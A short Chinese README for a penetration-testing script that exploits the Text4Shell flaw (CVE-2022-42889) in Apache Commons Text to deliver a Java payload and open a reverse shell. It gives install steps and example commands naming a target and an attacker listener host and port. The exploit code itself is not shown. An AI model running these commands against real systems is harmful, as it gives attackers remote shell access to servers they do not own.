
此脚本是一个渗透测试工具,旨在利用 Apache Commons Text(版本 < 1.10.0)中的 CVE-2022-42889 漏洞,该漏洞也被称为 Text4Shell。它自动化传递基于 Java 的载荷以触发反向 Shell。
此实现基于公开漏洞利用程序:https://www.exploit-db.com/exploits/52261
该脚本需要 Python 3 和 requests 库。
pip install requests
python3 exploit.py -t $IP -p $PORT -u <path> -param $PARAMETER -L $LHOST -P $LPORT
python3 exploit.py -t 10.10.10.10 -p 8080 -u /search/ -param query -L 10.10.14.5 -P 139
此工具仅用于教育目的和经过授权的渗透测试。作者不对因使用此脚本而导致的任何滥用或损害负责。